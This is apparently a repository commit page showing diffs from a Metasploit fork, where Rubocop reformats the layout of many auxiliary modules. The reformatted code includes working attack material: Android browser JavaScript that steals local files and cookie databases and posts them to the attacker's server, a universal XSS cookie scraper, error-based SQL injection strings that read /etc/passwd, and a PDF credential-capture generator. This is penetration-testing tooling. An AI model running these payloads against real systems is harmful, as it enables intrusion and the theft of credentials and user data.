adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions 9 Packages Projects Releases Wiki Activity

Runs Rubocop to fix layout in modules

Browse Source
This commit is contained in:
cgranleese-r7
2025-06-20 13:20:44 +01:00
parent 7208c10f37
commit a4b14d8b64
2320 changed files with 89510 additions and 89246 deletions
Download Patch File Download Diff File Expand all files Collapse all files
modules/auxiliary/admin/mssql/mssql_enum.rb
+3 -3
View File
@@ -22,9 +22,9 @@ class MetasploitModule < Msf::Auxiliary
'Author' => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>' ],
'License' => MSF_LICENSE,
'Notes' => {
'Stability' => [CRASH_SAFE],
'SideEffects' => [IOC_IN_LOGS],
'Reliability' => []
'Stability' => [CRASH_SAFE],
'SideEffects' => [IOC_IN_LOGS],
'Reliability' => []
}
)
)
modules/auxiliary/admin/smb/ms17_010_command.rb
+1 -1
View File
@@ -111,7 +111,7 @@ class MetasploitModule < Msf::Auxiliary
report_note(
:rhost => datastore['RHOSTS'],
:rport => datastore['RPORT'],
:type => "psexec_command",
:type => "psexec_command",
:name => datastore['COMMAND'],
:data => { :command_output => output }
)
modules/auxiliary/cloud/aws/enum_ec2.rb
+1 -1
View File
@@ -89,7 +89,7 @@ class MetasploitModule < Msf::Auxiliary
# host: inst.private_ip_address,
# type: 'ec2.public_ips',
# data: { :eips => eips.join(' ') }
#) unless eips.empty?
# ) unless eips.empty?
if inst.public_ip_address && !inst.public_dns_name.empty?
report_note(
host: inst.private_ip_address,
modules/auxiliary/dos/http/apache_range_dos.rb
+4 -4
View File
@@ -84,10 +84,10 @@ class MetasploitModule < Msf::Auxiliary
print_status("Found Byte-Range Header DOS at #{uri}")
report_note(
:host => rhost,
:port => rport,
:type => 'apache.killer',
:data => { :uri => uri }
:host => rhost,
:port => rport,
:type => 'apache.killer',
:data => { :uri => uri }
)
else
modules/auxiliary/fileformat/badpdf.rb
+17 -16
View File
@@ -7,27 +7,28 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(update_info(info,
'Name' => 'BADPDF Malicious PDF Creator',
'Description' => '
super(
update_info(
info,
'Name' => 'BADPDF Malicious PDF Creator',
'Description' => %q{
This module can either creates a blank PDF file which contains a UNC link which can be used
to capture NetNTLM credentials, or if the PDFINJECT option is used it will inject the necessary
code into an existing PDF document if possible.
',
'License' => MSF_LICENSE,
'Author' =>
[
'Assaf Baharav', # Code provided as POC by CheckPoint
'Yaron Fruchtmann', # Code provided as POC by CheckPoint
'Ido Solomon', # Code provided as POC by CheckPoint
'Richard Davy - secureyourit.co.uk', # Metasploit
],
'Platform' => ['win'],
'References' =>
[
},
'License' => MSF_LICENSE,
'Author' => [
'Assaf Baharav', # Code provided as POC by CheckPoint
'Yaron Fruchtmann', # Code provided as POC by CheckPoint
'Ido Solomon', # Code provided as POC by CheckPoint
'Richard Davy - secureyourit.co.uk', # Metasploit
],
'Platform' => ['win'],
'References' => [
['CVE', '2018-4993'],
['URL', 'https://research.checkpoint.com/ntlm-credentials-theft-via-pdf-files/']
])
]
)
)
register_options(
[
modules/auxiliary/fileformat/odt_badodt.rb
+41 -46
View File
File diff suppressed because one or more lines are too long
modules/auxiliary/gather/advantech_webaccess_creds.rb
+26 -24
View File
@@ -6,35 +6,37 @@
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => "Advantech WebAccess 8.1 Post Authentication Credential Collector",
'Description' => %q{
This module allows you to log into Advantech WebAccess 8.1, and collect all of the credentials.
Although authentication is required, any level of user permission can exploit this vulnerability.
def initialize(info = {})
super(
update_info(
info,
'Name' => "Advantech WebAccess 8.1 Post Authentication Credential Collector",
'Description' => %q{
This module allows you to log into Advantech WebAccess 8.1, and collect all of the credentials.
Although authentication is required, any level of user permission can exploit this vulnerability.
Note that 8.2 is not suitable for this.
},
'License' => MSF_LICENSE,
'Author' =>
[
Note that 8.2 is not suitable for this.
},
'License' => MSF_LICENSE,
'Author' => [
'h00die', # Pointed out the obvious during a PR review for CVE-2017-5154
'sinn3r', # Metasploit module
],
'References' =>
[
'References' => [
['CVE', '2016-5810'],
['URL', 'https://github.com/rapid7/metasploit-framework/pull/7859#issuecomment-274305229']
],
'DisclosureDate' => '2017-01-21'
))
'DisclosureDate' => '2017-01-21'
)
)
register_options(
[
OptString.new('WEBACCESSUSER', [true, 'Username for Advantech WebAccess', 'admin']),
OptString.new('WEBACCESSPASS', [false, 'Password for Advantech WebAccess', '']),
OptString.new('TARGETURI', [true, 'The base path to Advantech WebAccess', '/']),
])
]
)
end
def do_login
@@ -43,15 +45,15 @@ class MetasploitModule < Msf::Auxiliary
uri = normalize_uri(target_uri.path, 'broadweb', 'user', 'signin.asp')
res = send_request_cgi({
'method' => 'POST',
'uri' => uri,
'method' => 'POST',
'uri' => uri,
'vars_post' => {
'page' => '/',
'pos' => '',
'pos' => '',
'username' => datastore['WEBACCESSUSER'],
'password' => datastore['WEBACCESSPASS'],
'remMe' => '',
'submit1' => 'Login'
'remMe' => '',
'submit1' => 'Login'
}
})
@@ -77,11 +79,11 @@ class MetasploitModule < Msf::Auxiliary
def get_user_cred_detail(sid, user)
vprint_status("Gathering password for user: #{user}")
uri = normalize_uri(target_uri.path, 'broadWeb','user', 'upAdminPg.asp')
uri = normalize_uri(target_uri.path, 'broadWeb', 'user', 'upAdminPg.asp')
res = send_request_cgi({
'method' => 'GET',
'uri' => uri,
'uri' => uri,
'cookie' => sid,
'vars_get' => {
'uname' => user
@@ -106,7 +108,7 @@ class MetasploitModule < Msf::Auxiliary
res = send_request_cgi({
'method' => 'GET',
'uri' => uri,
'uri' => uri,
'cookie' => sid
})
modules/auxiliary/gather/alienvault_iso27001_sqli.rb
+27 -28
View File
@@ -6,45 +6,45 @@
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => "AlienVault Authenticated SQL Injection Arbitrary File Read",
'Description' => %q{
AlienVault 4.5.0 is susceptible to an authenticated SQL injection attack via a PNG
generation PHP file. This module exploits this to read an arbitrary file from
the file system. Any authenticated user is able to exploit it, as administrator
privileges aren't required.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Brandon Perry <bperry.volatile[at]gmail.com>' #meatpistol module
def initialize(info = {})
super(
update_info(
info,
'Name' => "AlienVault Authenticated SQL Injection Arbitrary File Read",
'Description' => %q{
AlienVault 4.5.0 is susceptible to an authenticated SQL injection attack via a PNG
generation PHP file. This module exploits this to read an arbitrary file from
the file system. Any authenticated user is able to exploit it, as administrator
privileges aren't required.
},
'License' => MSF_LICENSE,
'Author' => [
'Brandon Perry <bperry.volatile[at]gmail.com>' # meatpistol module
],
'References' =>
[
'References' => [
['EDB', '32644']
],
'DefaultOptions' =>
{
'DefaultOptions' => {
'SSL' => true
},
'Platform' => ['linux'],
'Privileged' => false,
'DisclosureDate' => '2014-03-30'))
'Platform' => ['linux'],
'Privileged' => false,
'DisclosureDate' => '2014-03-30'
)
)
register_options(
register_options(
[
Opt::RPORT(443),
OptString.new('FILEPATH', [ true, 'Path to remote file', '/etc/passwd' ]),
OptString.new('USERNAME', [ true, 'Single username' ]),
OptString.new('PASSWORD', [ true, 'Single password' ]),
OptString.new('TARGETURI', [ true, 'Relative URI of installation', '/' ])
])
]
)
end
def run
print_status("Get a valid session cookie...")
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'ossim', 'session', 'login.php')
@@ -113,7 +113,7 @@ class MetasploitModule < Msf::Auxiliary
full << str
vprint_status(str)
i = i+1
i = i + 1
end
path = store_loot('alienvault.file', 'text/plain', datastore['RHOST'], full, datastore['FILEPATH'])
@@ -121,9 +121,9 @@ class MetasploitModule < Msf::Auxiliary
end
def sqli(left_marker, right_marker, i, cookie, filename)
pay = "2014-02-28' AND (SELECT 1170 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]},"
pay = "2014-02-28' AND (SELECT 1170 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]},"
pay << "(SELECT MID((IFNULL(CAST(HEX(LOAD_FILE(0x#{filename})) AS CHAR),"
pay << "0x20)),#{(50*i)+1},50)),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS"
pay << "0x20)),#{(50 * i) + 1},50)),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS"
pay << " GROUP BY x)a) AND 'xnDa'='xnDa"
get = {
@@ -145,4 +145,3 @@ class MetasploitModule < Msf::Auxiliary
end
end
end
modules/auxiliary/gather/alienvault_newpolicyform_sqli.rb
+30 -30
View File
@@ -6,46 +6,46 @@
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => "AlienVault Authenticated SQL Injection Arbitrary File Read",
'Description' => %q{
AlienVault 4.6.1 and below is susceptible to an authenticated SQL injection attack against
newpolicyform.php, using the 'insertinto' parameter. This module exploits the vulnerability
to read an arbitrary file from the file system. Any authenticated user is able to exploit
this, as administrator privileges are not required.
},
'License' => MSF_LICENSE,
'Author' =>
[
def initialize(info = {})
super(
update_info(
info,
'Name' => "AlienVault Authenticated SQL Injection Arbitrary File Read",
'Description' => %q{
AlienVault 4.6.1 and below is susceptible to an authenticated SQL injection attack against
newpolicyform.php, using the 'insertinto' parameter. This module exploits the vulnerability
to read an arbitrary file from the file system. Any authenticated user is able to exploit
this, as administrator privileges are not required.
},
'License' => MSF_LICENSE,
'Author' => [
'Chris Hebert <chrisdhebert[at]gmail.com>'
],
'References' =>
[
'References' => [
['CVE', '2014-5383'],
['OSVDB', '106815'],
['EDB', '33317'],
['URL', 'http://forums.alienvault.com/discussion/2690/security-advisories-v4-6-1-and-lower']
],
'DefaultOptions' =>
{
'DefaultOptions' => {
'SSL' => true
},
'Privileged' => false,
'DisclosureDate' => '2014-05-09'))
'Privileged' => false,
'DisclosureDate' => '2014-05-09'
)
)
register_options([
Opt::RPORT(443),
OptString.new('FILEPATH', [ true, 'Path to remote file', '/etc/passwd' ]),
OptString.new('USERNAME', [ true, 'Single username' ]),
OptString.new('PASSWORD', [ true, 'Single password' ]),
OptString.new('TARGETURI', [ true, 'Relative URI of installation', '/' ]),
OptInt.new('SQLI_TIMEOUT', [ true, 'Specify the maximum time to exploit the sqli (in seconds)', 60])
])
register_options([
Opt::RPORT(443),
OptString.new('FILEPATH', [ true, 'Path to remote file', '/etc/passwd' ]),
OptString.new('USERNAME', [ true, 'Single username' ]),
OptString.new('PASSWORD', [ true, 'Single password' ]),
OptString.new('TARGETURI', [ true, 'Relative URI of installation', '/' ]),
OptInt.new('SQLI_TIMEOUT', [ true, 'Specify the maximum time to exploit the sqli (in seconds)', 60])
])
end
def run
print_status("Get a valid session cookie...")
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'ossim', 'session', 'login.php')
@@ -117,7 +117,7 @@ class MetasploitModule < Msf::Auxiliary
full << str
vprint_status(str)
i = i+1
i = i + 1
end
end
rescue ::Timeout::Error
@@ -134,9 +134,9 @@ class MetasploitModule < Msf::Auxiliary
end
def sqli(left_marker, right_marker, sql_true, i, cookie, filename)
pay = "X') AND (SELECT 1170 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]},"
pay = "X') AND (SELECT 1170 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]},"
pay << "(SELECT MID((IFNULL(CAST(HEX(LOAD_FILE(0x#{filename})) AS CHAR),"
pay << "0x20)),#{(50*i)+1},50)),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS"
pay << "0x20)),#{(50 * i) + 1},50)),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS"
pay << " GROUP BY x)a) AND ('0x#{sql_true.unpack("H*")[0]}'='0x#{sql_true.unpack("H*")[0]}"
get = {
modules/auxiliary/gather/android_browser_file_theft.rb
+24 -24
View File
@@ -3,36 +3,37 @@
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Auxiliary::Report
include Msf::Exploit::JSObfu
def initialize(info={})
super(update_info(info,
'Name' => 'Android Browser File Theft',
'Description' => %q{
This module steals the cookie, password, and autofill databases from the
Browser application on AOSP 4.3 and below.
},
'Author' => [
'Rafay Baloch', # Found UXSS bug in Android Browser
'joev' # File redirect and msf module
],
'License' => MSF_LICENSE,
'Actions' => [[ 'WebServer', 'Description' => 'Serve exploit via web server' ]],
'PassiveActions' => [ 'WebServer' ],
'References' =>
[
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Android Browser File Theft',
'Description' => %q{
This module steals the cookie, password, and autofill databases from the
Browser application on AOSP 4.3 and below.
},
'Author' => [
'Rafay Baloch', # Found UXSS bug in Android Browser
'joev' # File redirect and msf module
],
'License' => MSF_LICENSE,
'Actions' => [[ 'WebServer', 'Description' => 'Serve exploit via web server' ]],
'PassiveActions' => [ 'WebServer' ],
'References' => [
# patch for file redirection, 2014
['URL', 'https://android.googlesource.com/platform/packages/apps/Browser/+/d2391b492dec778452238bc6d9d549d56d41c107%5E%21/#F0'],
['URL', 'https://bugs.chromium.org/p/chromium/issues/detail?id=90222'] # the UXSS
],
'DefaultAction' => 'WebServer'
))
'DefaultAction' => 'WebServer'
)
)
register_options([
register_options([
OptString.new('ADDITIONAL_FILES', [
false,
'Comma-separated list of addition file URLs to steal.',
@@ -63,7 +64,7 @@ class MetasploitModule < Msf::Auxiliary
data = JSON.parse(request.body)
contents = hex2bin(data['data'])
file = File.basename(data['url'])
print_good("File received: #{(contents.bytesize.to_f/1000).round(2)}kb #{file}")
print_good("File received: #{(contents.bytesize.to_f / 1000).round(2)}kb #{file}")
loot_path = store_loot(
file,
'application/x-sqlite3',
@@ -75,7 +76,6 @@ class MetasploitModule < Msf::Auxiliary
print_good("Saved to: #{loot_path}")
end
def file_urls
default_urls = [
'file:///data/data/com.android.browser/databases/webviewCookiesChromium.db',
@@ -91,7 +91,7 @@ class MetasploitModule < Msf::Auxiliary
default_urls = []
end
default_urls + (datastore['ADDITIONAL_FILES']||'').split(',')
default_urls + (datastore['ADDITIONAL_FILES'] || '').split(',')
end
def exploit_html
@@ -140,7 +140,7 @@ class MetasploitModule < Msf::Auxiliary
return (c.length < 2) ? 0+c : c;
}).join(new String);
/*ensures there are no 'not allowed' responses that appear to be valid data*/
if (hex.length && hex.indexOf('#{Rex::Text.to_hex("<html><body>not allowed</body></html>","")}') === -1) {
if (hex.length && hex.indexOf('#{Rex::Text.to_hex("<html><body>not allowed</body></html>", "")}') === -1) {
top.postMessage({data:hex,url:location.href}, '*');
}
parent.postMessage(1,'*');
modules/auxiliary/gather/android_browser_new_tab_cookie_theft.rb
+29 -28
View File
@@ -3,41 +3,42 @@
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Auxiliary::Report
include Msf::Exploit::JSObfu
def initialize(info={})
super(update_info(info,
'Name' => 'Android Browser "Open in New Tab" Cookie Theft',
'Description' => %q{
In Android's stock AOSP Browser application and WebView component, the
"open in new tab" functionality allows a file URL to be opened. On
versions of Android before 4.4, the path to the sqlite cookie
database could be specified. By saving a cookie containing a <script>
tag and then loading the sqlite database into the browser as an HTML file,
XSS can be achieved inside the cookie file, disclosing *all* cookies
(HttpOnly or not) to an attacker.
},
'Author' => [
'Rafay Baloch', # Discovery of "Open in new tab" bug
'joev' # Cookie theft vector, msf module
],
'License' => MSF_LICENSE,
'Actions' => [[ 'WebServer', 'Description' => 'Serve exploit via web server' ]],
'PassiveActions' => [ 'WebServer' ],
'References' =>
[
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Android Browser "Open in New Tab" Cookie Theft',
'Description' => %q{
In Android's stock AOSP Browser application and WebView component, the
"open in new tab" functionality allows a file URL to be opened. On
versions of Android before 4.4, the path to the sqlite cookie
database could be specified. By saving a cookie containing a <script>
tag and then loading the sqlite database into the browser as an HTML file,
XSS can be achieved inside the cookie file, disclosing *all* cookies
(HttpOnly or not) to an attacker.
},
'Author' => [
'Rafay Baloch', # Discovery of "Open in new tab" bug
'joev' # Cookie theft vector, msf module
],
'License' => MSF_LICENSE,
'Actions' => [[ 'WebServer', 'Description' => 'Serve exploit via web server' ]],
'PassiveActions' => [ 'WebServer' ],
'References' => [
# the patch, released against 4.3 AOSP in February 2014
['URL', 'https://android.googlesource.com/platform/packages/apps/Browser/+/d2391b492dec778452238bc6d9d549d56d41c107%5E%21/#F0'],
['URL', 'http://www.rafayhackingarticles.net/2014/12/android-browser-cross-scheme-data.html']
],
'DefaultAction' => 'WebServer'
))
'DefaultAction' => 'WebServer'
)
)
register_options([
register_options([
OptString.new('COOKIE_FILE', [
true,
'The cookie file (on older 2.x devices this is "webview.db")',
@@ -62,7 +63,7 @@ class MetasploitModule < Msf::Auxiliary
def process_post(cli, request)
data = hex2bin(request.body)
print_good "Cookies received: #{request.body.length.to_f/1024}kb"
print_good "Cookies received: #{request.body.length.to_f / 1024}kb"
loot_path = store_loot(
"android.browser.cookies",
'application/x-sqlite3',
@@ -124,7 +125,7 @@ class MetasploitModule < Msf::Auxiliary
|
end
def cookie_path(file='')
def cookie_path(file = '')
'/data/data/com.android.browser/databases/' + file
end
@@ -134,6 +135,6 @@ class MetasploitModule < Msf::Auxiliary
end
def per_run_token
@token ||= Rex::Text.rand_text_alpha(rand(2)+1)
@token ||= Rex::Text.rand_text_alpha(rand(2) + 1)
end
end
modules/auxiliary/gather/android_htmlfileprovider.rb
+85 -83
View File
@@ -8,38 +8,41 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'Android Content Provider File Disclosure',
'Description' => %q{
super(
update_info(
info,
'Name' => 'Android Content Provider File Disclosure',
'Description' => %q{
This module exploits a cross-domain issue within the Android web browser to
exfiltrate files from a vulnerable device.
},
'Author' =>
[
'Thomas Cannon', # Original discovery, partial disclsoure
'jduck' # Metasploit module
exfiltrate files from a vulnerable device.
},
'Author' => [
'Thomas Cannon', # Original discovery, partial disclsoure
'jduck' # Metasploit module
],
'License' => MSF_LICENSE,
'Actions' =>
[
'License' => MSF_LICENSE,
'Actions' => [
[ 'WebServer' ]
],
'PassiveActions' =>
[
'PassiveActions' => [
'WebServer'
],
'References' =>
[
'References' => [
[ 'CVE', '2010-4804' ],
[ 'URL', 'http://thomascannon.net/blog/2010/11/android-data-stealing-vulnerability/' ]
],
'DefaultAction' => 'WebServer'))
'DefaultAction' => 'WebServer'
)
)
register_options(
[
OptString.new('FILES', [ false, "The remote file(s) to steal",
'/proc/version,/proc/self/status,/data/system/packages.list' ])
])
OptString.new('FILES', [
false, "The remote file(s) to steal",
'/proc/version,/proc/self/status,/data/system/packages.list'
])
]
)
end
def on_request_uri(cli, request)
@@ -47,6 +50,7 @@ class MetasploitModule < Msf::Auxiliary
selected_headers = [ 'user-agent', 'origin', 'referer' ]
request.headers.each_key { |k|
next if not selected_headers.include? k.downcase
print_status("#{k}: #{request.headers[k]}")
}
@@ -55,77 +59,76 @@ class MetasploitModule < Msf::Auxiliary
# Only GET requests now..
if request.uri =~ /\.html?$/
filename = request.uri.split('/').last
target_files = datastore['FILES'].split(',').map{ |e|
target_files = datastore['FILES'].split(',').map { |e|
"'%s'" % e
}.join(',')
upload_url = get_uri(cli)
upload_url << '/' if upload_url[-1,1] != '/'
upload_url << '/' if upload_url[-1, 1] != '/'
upload_url << 'q'
html = <<-EOS
<html>
<body>
<script lang=javascript>
var target_files = Array(#{target_files});
var results = new Array();
function addField(form, name, value) {
var hf = document.createElement('input');
hf.setAttribute('type', 'hidden');
hf.setAttribute('name', name);
hf.setAttribute('value', value);
form.appendChild(hf);
}
function uploadFiles(files) {
var form = document.createElement('form');
form.setAttribute('method', 'POST');
form.setAttribute('action', '#{upload_url}');
var i = 0;
for (var fn in files) {
addField(form, 'f'+i, btoa(fn));
addField(form, 'd'+i, files[fn]);
i += 1;
}
document.body.appendChild(form);
form.submit();
}
for (var fn in target_files) {
fn = target_files[fn];
xh = new XMLHttpRequest();
xh.open('GET', fn, false);
xh.onreadystatechange = function() { if (xh.readyState == 4) { results[fn] = btoa(xh.responseText); } }
xh.send();
}
uploadFiles(results);
</script>
</body>
</html>
EOS
html = <<~EOS
<html>
<body>
<script lang=javascript>
var target_files = Array(#{target_files});
var results = new Array();
function addField(form, name, value) {
var hf = document.createElement('input');
hf.setAttribute('type', 'hidden');
hf.setAttribute('name', name);
hf.setAttribute('value', value);
form.appendChild(hf);
}
function uploadFiles(files) {
var form = document.createElement('form');
form.setAttribute('method', 'POST');
form.setAttribute('action', '#{upload_url}');
var i = 0;
for (var fn in files) {
addField(form, 'f'+i, btoa(fn));
addField(form, 'd'+i, files[fn]);
i += 1;
}
document.body.appendChild(form);
form.submit();
}
for (var fn in target_files) {
fn = target_files[fn];
xh = new XMLHttpRequest();
xh.open('GET', fn, false);
xh.onreadystatechange = function() { if (xh.readyState == 4) { results[fn] = btoa(xh.responseText); } }
xh.send();
}
uploadFiles(results);
</script>
</body>
</html>
EOS
print_status("Sending payload HTML ...")
send_response_html(cli, html,
{
'Cache-Control' => 'public',
'Content-Description' => 'File Transfer',
'Content-Disposition' => "attachment; filename=#{filename}",
'Content-Transfer-Encoding' => 'binary',
'Content-Type' => 'text/html'
})
{
'Cache-Control' => 'public',
'Content-Description' => 'File Transfer',
'Content-Disposition' => "attachment; filename=#{filename}",
'Content-Transfer-Encoding' => 'binary',
'Content-Type' => 'text/html'
})
else
payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))
payload_fn = Rex::Text.rand_text_alphanumeric(4 + rand(8))
html = <<-EOS
<html>
<body>
<script lang=javascript>
setTimeout("document.location = 'content://com.android.htmlfileprovider/sdcard/download/#{payload_fn}.html';", 5000);
setTimeout("document.location = '#{payload_fn}.html';", 500);
</script>
</body>
</html>
EOS
html = <<~EOS
<html>
<body>
<script lang=javascript>
setTimeout("document.location = 'content://com.android.htmlfileprovider/sdcard/download/#{payload_fn}.html';", 5000);
setTimeout("document.location = '#{payload_fn}.html';", 500);
</script>
</body>
</html>
EOS
print_status("Sending initial HTML ...")
send_response_html(cli, html)
@@ -134,7 +137,6 @@ EOS
end
def process_post(cli, request)
results = {}
if request and request.body
@@ -143,9 +145,9 @@ EOS
if parts.length != 2
print_error("Weird, we got a var that doesn't contain an equals: #{parts.inspect}")
else
fln,fld = parts
fln, fld = parts
fld = Rex::Text.uri_decode(fld).unpack('m').first
start = fln.slice!(0,1)
start = fln.slice!(0, 1)
if start == "f"
results[fln] ||= {}
results[fln][:filename] = fld
@@ -165,7 +167,7 @@ EOS
fn.gsub!(/[\/\\]/, '.')
fn.gsub!(/^\./, '')
store_loot('android.fs.'+fn, 'application/octet-stream', cli.peerhost, data, fn)
store_loot('android.fs.' + fn, 'application/octet-stream', cli.peerhost, data, fn)
}
send_response_html(cli, "thx")
modules/auxiliary/gather/android_object_tag_webview_uxss.rb
+34 -31
View File
@@ -9,37 +9,40 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',
'Description' => %q{
This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in
all versions of Android's open source stock browser before 4.4, and Android apps running
on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug
to scrape both cookie data and page contents from a vulnerable browser window.
super(
update_info(
info,
'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',
'Description' => %q{
This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in
all versions of Android's open source stock browser before 4.4, and Android apps running
on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug
to scrape both cookie data and page contents from a vulnerable browser window.
Target URLs that use X-Frame-Options can not be exploited with this vulnerability.
Target URLs that use X-Frame-Options can not be exploited with this vulnerability.
Some sample UXSS scripts are provided in data/exploits/uxss.
},
'Author' => [
'Rafay Baloch', # Original discovery, disclosure
'joev' # Metasploit module
],
'License' => MSF_LICENSE,
'Actions' => [
[ 'WebServer' ]
],
'PassiveActions' => [
'WebServer'
],
'References' => [
[ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],
[ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],
[ 'URL', 'http://trac.webkit.org/changeset/96826/webkit' ]
],
'DefaultAction' => 'WebServer',
'DisclosureDate' => '2014-10-04'
))
Some sample UXSS scripts are provided in data/exploits/uxss.
},
'Author' => [
'Rafay Baloch', # Original discovery, disclosure
'joev' # Metasploit module
],
'License' => MSF_LICENSE,
'Actions' => [
[ 'WebServer' ]
],
'PassiveActions' => [
'WebServer'
],
'References' => [
[ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],
[ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],
[ 'URL', 'http://trac.webkit.org/changeset/96826/webkit' ]
],
'DefaultAction' => 'WebServer',
'DisclosureDate' => '2014-10-04'
)
)
register_options([
OptString.new('TARGET_URLS', [
@@ -67,7 +70,7 @@ class MetasploitModule < Msf::Auxiliary
collect_data(request)
send_response_html(cli, '')
else
payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))
payload_fn = Rex::Text.rand_text_alphanumeric(4 + rand(8))
domains = datastore['TARGET_URLS'].split(',')
script = js_obfuscate <<-EOS
@@ -81,7 +84,7 @@ class MetasploitModule < Msf::Auxiliary
'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+
'TML,i:'+(i||0)+'}),"*");eval(atob("#{Rex::Text.encode_base64(custom_js)}"'+
'));}void(0);';
obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';
obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12) + 5)}';
};
document.body.appendChild(obj);
});
modules/auxiliary/gather/android_stock_browser_uxss.rb
+36 -33
View File
@@ -8,40 +8,43 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',
'Description' => %q{
This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in
all versions of Android's open source stock browser before 4.4, and Android apps running
on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug
to scrape both cookie data and page contents from a vulnerable browser window.
super(
update_info(
info,
'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',
'Description' => %q{
This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in
all versions of Android's open source stock browser before 4.4, and Android apps running
on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug
to scrape both cookie data and page contents from a vulnerable browser window.
If your target URLs use X-Frame-Options, you can enable the "BYPASS_XFO" option,
which will cause a popup window to be used. This requires a click from the user
and is much less stealthy, but is generally harmless-looking.
If your target URLs use X-Frame-Options, you can enable the "BYPASS_XFO" option,
which will cause a popup window to be used. This requires a click from the user
and is much less stealthy, but is generally harmless-looking.
By supplying a CUSTOM_JS parameter and ensuring CLOSE_POPUP is set to false, this
module also allows running arbitrary javascript in the context of the targeted URL.
Some sample UXSS scripts are provided in data/exploits/uxss.
},
'Author' => [
'Rafay Baloch', # Original discovery, disclosure
'joev' # Metasploit module
],
'License' => MSF_LICENSE,
'Actions' => [
[ 'WebServer' ]
],
'PassiveActions' => [
'WebServer'
],
'References' => [
[ 'URL', 'http://1337day.com/exploit/description/22581' ],
[ 'OSVDB', '110664' ],
[ 'CVE', '2014-6041' ]
],
'DefaultAction' => 'WebServer'
))
By supplying a CUSTOM_JS parameter and ensuring CLOSE_POPUP is set to false, this
module also allows running arbitrary javascript in the context of the targeted URL.
Some sample UXSS scripts are provided in data/exploits/uxss.
},
'Author' => [
'Rafay Baloch', # Original discovery, disclosure
'joev' # Metasploit module
],
'License' => MSF_LICENSE,
'Actions' => [
[ 'WebServer' ]
],
'PassiveActions' => [
'WebServer'
],
'References' => [
[ 'URL', 'http://1337day.com/exploit/description/22581' ],
[ 'OSVDB', '110664' ],
[ 'CVE', '2014-6041' ]
],
'DefaultAction' => 'WebServer'
)
)
register_options([
OptString.new('TARGET_URLS', [
@@ -79,7 +82,7 @@ class MetasploitModule < Msf::Auxiliary
collect_data(request)
send_response_html(cli, '')
else
payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))
payload_fn = Rex::Text.rand_text_alphanumeric(4 + rand(8))
domains = datastore['TARGET_URLS'].split(',')
html = <<-EOS
modules/auxiliary/gather/apache_rave_creds.rb
+26 -28
View File
@@ -8,30 +8,31 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'Apache Rave User Information Disclosure',
'Description' => %q{
This module exploits an information disclosure in Apache Rave 0.20 and prior. The
vulnerability exists in the RPC API, which allows any authenticated user to
disclose information about all the users, including their password hashes. In order
to authenticate, the user can provide his own credentials. Also the default users
installed with Apache Rave 0.20 will be tried automatically. This module has been
successfully tested on Apache Rave 0.20.
},
'License' => MSF_LICENSE,
'Author' =>
[
super(
update_info(
info,
